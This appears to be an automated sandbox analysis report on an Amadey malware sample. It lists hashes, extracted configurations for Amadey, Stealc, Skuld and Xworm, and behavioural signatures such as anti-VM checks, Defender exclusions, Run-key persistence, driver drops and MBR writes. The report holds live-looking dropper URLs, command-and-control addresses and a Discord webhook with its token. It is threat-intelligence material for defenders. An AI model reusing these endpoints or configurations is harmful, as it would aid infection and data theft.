amadey | a66ad1178645f946e6e9b98c181e660df8bf87c38c88b220a24f35f0406cc107

Analysis

max time kernel
124s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20250314-en
resource tags

arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
submitted
22/03/2025, 13:25

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

random.exe
Size

5.5MB
MD5

8aa52be570da2efe4885957e29b89538
SHA1

2ad2e47c307b34d9a593e21dfe0dba723c110b3d
SHA256

a66ad1178645f946e6e9b98c181e660df8bf87c38c88b220a24f35f0406cc107
SHA512

c685dd857057879a6ff8bdb7279511e940babeb7f358a94e33fea308ac0bd8ceb6d2bcd758dd38eada0995bb96f910d5728c1431286f0875d2ca392b0ca7308e
SSDEEP

98304:ZDpKjlkbVghclaJ8RhIc1pX452gw8QzbRwm5H3gzIFNM2w+1R:yxQZFzQQ/5HvX9

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://196.251.91.42/up/uploads/encryption02.jpg

exe.dropper

http://196.251.91.42/up/uploads/encryption02.jpg

Extracted

Family

amadey

Version

5.21

Botnet

092155

http://176.113.115.6

Attributes

install_dir
bb556cff4a
install_file
rapes.exe
strings_key
a131b127e996a898cd19ffb2d92e481b
url_paths
/Ni9kiput/index.php

rc4.plain

Extracted

Family

stealc

Botnet

trump

http://45.93.20.28

Attributes

url_path
/85a1cacf11314eb8.php

Extracted

Family

skuld

https://discordapp.com/api/webhooks/1349647136895012916/qSys_fpsL_y7usKH_AyrFupSjzSsVfg2t895g2HV8Yz72asrwCIsHaqqhPtDFjz8g8_E

Extracted

Family

xworm

Version

5.0

httpss.myvnc.com:1907

Mutex

xWIArEKzuXpfRVkJ

Attributes

install_file
USB.exe

aes.plain

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Amadey family
amadey

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral1/memory/7908-25152-0x0000000000400000-0x000000000040E000-memory.dmp	family_xworm
behavioral1/memory/6208-45314-0x000000000A1D0000-0x000000000A666000-memory.dmp	family_xworm

GCleaner
GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.
loader gcleaner
Gcleaner family
gcleaner

Process spawned unexpected child process 2 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	10716	1324	conhost.exe	97
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	11956	1324	conhost.exe	97

Skuld family
skuld
Skuld stealer
An info stealer written in Go lang.
stealer skuld
Stealc
Stealc is an infostealer written in C++.
stealer stealc
Stealc family
stealc

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 11872 created 3024	11872	Organizations.com	50

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 8 IoCs

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	2S4013.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	3W01C.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	adee9986a1.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	k3t05Da.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	1P27l3.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe

Blocklisted process makes network request 6 IoCs

flow	pid	Process
99	6604	powershell.exe
101	9436	powershell.exe
104	6604	powershell.exe
118	9436	powershell.exe
120	10756	powershell.exe
130	12012	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 13 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
3960	powershell.exe
8820	powershell.exe
7472	powershell.exe
9436	powershell.exe
10756	powershell.exe
12012	powershell.exe
368	powershell.exe
6604	powershell.exe
5124	powershell.exe
10396	powershell.exe
9872	powershell.exe
6208	powershell.exe
12572	powershell.exe

Downloads MZ/PE file 14 IoCs

flow	pid	Process
87	3252	rapes.exe
110	3252	rapes.exe
215	3252	rapes.exe
193	3844	svchost015.exe
39	3252	rapes.exe
46	3252	rapes.exe
208	3252	rapes.exe
223	3252	rapes.exe
43	1848	svchost.exe
172	3252	rapes.exe
172	3252	rapes.exe
172	3252	rapes.exe
172	3252	rapes.exe
34	3252	rapes.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File created	C:\Windows\System32\Drivers\750fb06b.sys	cc38af32.exe
File created	C:\Windows\System32\Drivers\klupd_750fb06ba_arkmon.sys	cc38af32.exe
File created	C:\Windows\System32\Drivers\klupd_750fb06ba_klbg.sys	cc38af32.exe

Sets service image path in registry 2 TTPs 6 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\750fb06b\ImagePath = "System32\\Drivers\\750fb06b.sys"	cc38af32.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_750fb06ba_arkmon\ImagePath = "System32\\Drivers\\klupd_750fb06ba_arkmon.sys"	cc38af32.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_750fb06ba_klbg\ImagePath = "System32\\Drivers\\klupd_750fb06ba_klbg.sys"	cc38af32.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_750fb06ba_klark\ImagePath = "System32\\Drivers\\klupd_750fb06ba_klark.sys"	cc38af32.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_750fb06ba_mark\ImagePath = "System32\\Drivers\\klupd_750fb06ba_mark.sys"	cc38af32.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_750fb06ba_arkmon_7C924DD4\ImagePath = "\\??\\C:\\KVRT2020_Data\\Temp\\7C924DD4D20055C80007791130E2D03F\\klupd_750fb06ba_arkmon.sys"	cc38af32.exe

Checks BIOS information in registry 2 TTPs 16 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	k3t05Da.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	1P27l3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	k3t05Da.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	1P27l3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	2S4013.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	2S4013.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	adee9986a1.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	3W01C.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	3W01C.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	adee9986a1.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe

Checks computer location settings 2 TTPs 5 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Control Panel\International\Geo\Nation	zx4PJh6.exe
Key value queried	\REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Control Panel\International\Geo\Nation	1P27l3.exe
Key value queried	\REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Control Panel\International\Geo\Nation	rapes.exe
Key value queried	\REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Control Panel\International\Geo\Nation	cmd.exe

Deletes itself 1 IoCs

pid	Process
392	tzutil.exe

Executes dropped EXE 28 IoCs

pid	Process
4052	G8U31.exe
1732	1P27l3.exe
3252	rapes.exe
4600	2S4013.exe
2340	3W01C.exe
3000	adee9986a1.exe
3844	svchost015.exe
2076	laf6w_001.exe
2284	upnpcont.exe
392	tzutil.exe
1120	eBOjg2u.exe
8324	eBOjg2u.exe
5516	rapes.exe
12812	1d53210e.exe
6320	cc38af32.exe
7192	weC48Q7.exe
7532	windowscore.exe
5152	Kr9UTz2.exe
5796	zx4PJh6.exe
10684	50KfF6O.exe
11872	Organizations.com
12648	OkH8IPF.exe
10356	ARxx7NW.exe
13168	0000008658.exe
8588	wjfOfXh.exe
5696	rapes.exe
2832	k3t05Da.exe
6536	Attributes.exe

Identifies Wine through registry keys 2 TTPs 7 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Software\Wine	2S4013.exe
Key opened	\REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Software\Wine	3W01C.exe
Key opened	\REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Software\Wine	adee9986a1.exe
Key opened	\REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Software\Wine	1P27l3.exe

Impair Defenses: Safe Mode Boot 1 TTPs 2 IoCs

defense_evasion

Safe Mode Boot

T1562.009

description	ioc	Process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\750fb06b.sys	cc38af32.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\750fb06b.sys\ = "Driver"	cc38af32.exe

Loads dropped DLL 64 IoCs

pid	Process
6320	cc38af32.exe
6320	cc38af32.exe
6320	cc38af32.exe
6320	cc38af32.exe
6320	cc38af32.exe
6320	cc38af32.exe
6320	cc38af32.exe
6320	cc38af32.exe
6320	cc38af32.exe
6320	cc38af32.exe
6320	cc38af32.exe
6320	cc38af32.exe
6320	cc38af32.exe
6320	cc38af32.exe
6320	cc38af32.exe
6320	cc38af32.exe
6320	cc38af32.exe
6320	cc38af32.exe
6320	cc38af32.exe
7532	windowscore.exe
7532	windowscore.exe
7532	windowscore.exe
7532	windowscore.exe
7532	windowscore.exe
7532	windowscore.exe
7532	windowscore.exe
7532	windowscore.exe
7532	windowscore.exe
7532	windowscore.exe
7532	windowscore.exe
7532	windowscore.exe
7532	windowscore.exe
7532	windowscore.exe
7532	windowscore.exe
7532	windowscore.exe
7532	windowscore.exe
7532	windowscore.exe
7532	windowscore.exe
7532	windowscore.exe
7532	windowscore.exe
7532	windowscore.exe
7532	windowscore.exe
7532	windowscore.exe
7532	windowscore.exe
7532	windowscore.exe
7532	windowscore.exe
7532	windowscore.exe
7532	windowscore.exe
7532	windowscore.exe
7532	windowscore.exe
7532	windowscore.exe
7532	windowscore.exe
7532	windowscore.exe
7532	windowscore.exe
7532	windowscore.exe
7532	windowscore.exe
7532	windowscore.exe
7532	windowscore.exe
7532	windowscore.exe
7532	windowscore.exe
7532	windowscore.exe
7532	windowscore.exe
7532	windowscore.exe
7532	windowscore.exe

Obfuscated with Agile.Net obfuscator 2 IoCs

Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.

agilenet

resource	yara_rule
behavioral1/files/0x00070000000241d6-24155.dat	agile_net
behavioral1/memory/2832-24172-0x0000000000D10000-0x00000000012FC000-memory.dmp	agile_net

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Themida packer 4 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral1/files/0x00070000000241e3-24182.dat	themida
behavioral1/memory/2832-24185-0x000000006D540000-0x000000006DB20000-memory.dmp	themida
behavioral1/memory/2832-24400-0x000000006D540000-0x000000006DB20000-memory.dmp	themida
behavioral1/memory/2832-25150-0x000000006D540000-0x000000006DB20000-memory.dmp	themida

Adds Run key to start application 2 TTPs 8 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {7621FABD-8E1C-4682-ACCD-F95D288F67B3}"	svchost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {7621FABD-8E1C-4682-ACCD-F95D288F67B3}"	svchost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	eBOjg2u.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\""	eBOjg2u.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\af61141f-8fec-4dcf-9163-d9a847fcef86 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\{b7e41ef7-510e-4915-af75-ec4abfe317ea}\\af61141f-8fec-4dcf-9163-d9a847fcef86.cmd\""	cc38af32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio Universal Service = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Protect\\SecurityHealthSystray.exe"	50KfF6O.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	random.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\""	G8U31.exe

Checks for any installed AV software in registry 1 TTPs 1 IoCs

Security Software Discovery

T1518.001

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\SOFTWARE\KasperskyLab	cc38af32.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 1 IoCs

defense_evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	k3t05Da.exe

Enumerates connected drives 3 TTPs 1 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\F:	cc38af32.exe

Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1542.003

description	ioc	Process
File opened for modification	\??\PhysicalDrive0	cc38af32.exe

Enumerates processes with tasklist 1 TTPs 2 IoCs

discovery

Process Discovery

T1057

pid	Process
9848	tasklist.exe
9600	tasklist.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs

pid	Process
1732	1P27l3.exe
3252	rapes.exe
4600	2S4013.exe
2340	3W01C.exe
3000	adee9986a1.exe
5516	rapes.exe
5696	rapes.exe

Suspicious use of SetThreadContext 5 IoCs

description	pid	Process	procid_target
PID 3000 set thread context of 3844	3000	adee9986a1.exe	104
PID 6604 set thread context of 10292	6604	powershell.exe	129
PID 9436 set thread context of 11532	9436	powershell.exe	136
PID 5152 set thread context of 8896	5152	Kr9UTz2.exe	151
PID 12648 set thread context of 12712	12648	OkH8IPF.exe	175

UPX packed file 3 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x00070000000241b4-17806.dat	upx
behavioral1/memory/10684-17819-0x0000000000D90000-0x000000000181E000-memory.dmp	upx
behavioral1/memory/10684-17847-0x0000000000D90000-0x000000000181E000-memory.dmp	upx

Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs

Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\VBoxMiniRdrDN	1d53210e.exe
File opened (read-only)	\??\VBoxMiniRdrDN	cc38af32.exe

Drops file in Program Files directory 1 IoCs

description	ioc	Process
File created	C:\Program Files\RuntimeApp\0000008658.exe	ARxx7NW.exe

Drops file in Windows directory 8 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\rapes.job	1P27l3.exe
File opened for modification	C:\Windows\NecessityInfections	zx4PJh6.exe
File opened for modification	C:\Windows\VancouverPulse	zx4PJh6.exe
File opened for modification	C:\Windows\GuaranteesFear	zx4PJh6.exe
File opened for modification	C:\Windows\SheDrum	zx4PJh6.exe
File opened for modification	C:\Windows\OfficeForbes	zx4PJh6.exe
File opened for modification	C:\Windows\InvestingTr	zx4PJh6.exe
File opened for modification	C:\Windows\CylinderPair	zx4PJh6.exe

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 2 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	cc38af32.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	cc38af32.exe

Program crash 1 IoCs

pid	pid_target	Process	procid_target
13144	11872	WerFault.exe	170

System Location Discovery: System Language Discovery 1 TTPs 32 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	laf6w_001.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CMD.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	k3t05Da.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	random.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Organizations.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	choice.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	1P27l3.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cc38af32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	G8U31.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	3W01C.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost015.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	zx4PJh6.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	extrac32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rapes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2S4013.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	adee9986a1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	1d53210e.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wjfOfXh.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000_Classes\Local Settings	cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000_Classes\Local Settings	cmd.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
12992	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1732	1P27l3.exe
1732	1P27l3.exe
3252	rapes.exe
3252	rapes.exe
4600	2S4013.exe
4600	2S4013.exe
4600	2S4013.exe
4600	2S4013.exe
4600	2S4013.exe
4600	2S4013.exe
2340	3W01C.exe
2340	3W01C.exe
3000	adee9986a1.exe
3000	adee9986a1.exe
3960	powershell.exe
3960	powershell.exe
3960	powershell.exe
368	powershell.exe
368	powershell.exe
368	powershell.exe
6604	powershell.exe
6604	powershell.exe
6604	powershell.exe
5124	powershell.exe
5124	powershell.exe
5124	powershell.exe
9436	powershell.exe
9436	powershell.exe
9436	powershell.exe
10292	RegAsm.exe
10292	RegAsm.exe
10292	RegAsm.exe
10292	RegAsm.exe
10756	powershell.exe
10756	powershell.exe
10756	powershell.exe
11532	RegAsm.exe
11532	RegAsm.exe
11532	RegAsm.exe
11532	RegAsm.exe
12012	powershell.exe
12012	powershell.exe
12012	powershell.exe
5516	rapes.exe
5516	rapes.exe
8896	MSBuild.exe
8896	MSBuild.exe
8896	MSBuild.exe
8896	MSBuild.exe
6320	cc38af32.exe
6320	cc38af32.exe
6320	cc38af32.exe
6320	cc38af32.exe
11872	Organizations.com
11872	Organizations.com
11872	Organizations.com
11872	Organizations.com
11872	Organizations.com
11872	Organizations.com
12712	MSBuild.exe
12712	MSBuild.exe
12712	MSBuild.exe
12712	MSBuild.exe
12572	powershell.exe

Suspicious behavior: LoadsDriver 4 IoCs

pid	Process
6320	cc38af32.exe
6320	cc38af32.exe
6320	cc38af32.exe
6320	cc38af32.exe

Suspicious behavior: MapViewOfSection 3 IoCs

pid	Process
2076	laf6w_001.exe
2076	laf6w_001.exe
2076	laf6w_001.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3960	powershell.exe
Token: SeIncreaseQuotaPrivilege	212	WMIC.exe
Token: SeSecurityPrivilege	212	WMIC.exe
Token: SeTakeOwnershipPrivilege	212	WMIC.exe
Token: SeLoadDriverPrivilege	212	WMIC.exe
Token: SeSystemProfilePrivilege	212	WMIC.exe
Token: SeSystemtimePrivilege	212	WMIC.exe
Token: SeProfSingleProcessPrivilege	212	WMIC.exe
Token: SeIncBasePriorityPrivilege	212	WMIC.exe
Token: SeCreatePagefilePrivilege	212	WMIC.exe
Token: SeBackupPrivilege	212	WMIC.exe
Token: SeRestorePrivilege	212	WMIC.exe
Token: SeShutdownPrivilege	212	WMIC.exe
Token: SeDebugPrivilege	212	WMIC.exe
Token: SeSystemEnvironmentPrivilege	212	WMIC.exe
Token: SeRemoteShutdownPrivilege	212	WMIC.exe
Token: SeUndockPrivilege	212	WMIC.exe
Token: SeManageVolumePrivilege	212	WMIC.exe
Token: 33	212	WMIC.exe
Token: 34	212	WMIC.exe
Token: 35	212	WMIC.exe
Token: 36	212	WMIC.exe
Token: SeIncreaseQuotaPrivilege	212	WMIC.exe
Token: SeSecurityPrivilege	212	WMIC.exe
Token: SeTakeOwnershipPrivilege	212	WMIC.exe
Token: SeLoadDriverPrivilege	212	WMIC.exe
Token: SeSystemProfilePrivilege	212	WMIC.exe
Token: SeSystemtimePrivilege	212	WMIC.exe
Token: SeProfSingleProcessPrivilege	212	WMIC.exe
Token: SeIncBasePriorityPrivilege	212	WMIC.exe
Token: SeCreatePagefilePrivilege	212	WMIC.exe
Token: SeBackupPrivilege	212	WMIC.exe
Token: SeRestorePrivilege	212	WMIC.exe
Token: SeShutdownPrivilege	212	WMIC.exe
Token: SeDebugPrivilege	212	WMIC.exe
Token: SeSystemEnvironmentPrivilege	212	WMIC.exe
Token: SeRemoteShutdownPrivilege	212	WMIC.exe
Token: SeUndockPrivilege	212	WMIC.exe
Token: SeManageVolumePrivilege	212	WMIC.exe
Token: 33	212	WMIC.exe
Token: 34	212	WMIC.exe
Token: 35	212	WMIC.exe
Token: 36	212	WMIC.exe
Token: SeDebugPrivilege	368	powershell.exe
Token: SeDebugPrivilege	6604	powershell.exe
Token: SeIncreaseQuotaPrivilege	9036	WMIC.exe
Token: SeSecurityPrivilege	9036	WMIC.exe
Token: SeTakeOwnershipPrivilege	9036	WMIC.exe
Token: SeLoadDriverPrivilege	9036	WMIC.exe
Token: SeSystemProfilePrivilege	9036	WMIC.exe
Token: SeSystemtimePrivilege	9036	WMIC.exe
Token: SeProfSingleProcessPrivilege	9036	WMIC.exe
Token: SeIncBasePriorityPrivilege	9036	WMIC.exe
Token: SeCreatePagefilePrivilege	9036	WMIC.exe
Token: SeBackupPrivilege	9036	WMIC.exe
Token: SeRestorePrivilege	9036	WMIC.exe
Token: SeShutdownPrivilege	9036	WMIC.exe
Token: SeDebugPrivilege	9036	WMIC.exe
Token: SeSystemEnvironmentPrivilege	9036	WMIC.exe
Token: SeRemoteShutdownPrivilege	9036	WMIC.exe
Token: SeUndockPrivilege	9036	WMIC.exe
Token: SeManageVolumePrivilege	9036	WMIC.exe
Token: 33	9036	WMIC.exe
Token: 34	9036	WMIC.exe

Suspicious use of FindShellTrayWindow 4 IoCs

pid	Process
1732	1P27l3.exe
11872	Organizations.com
11872	Organizations.com
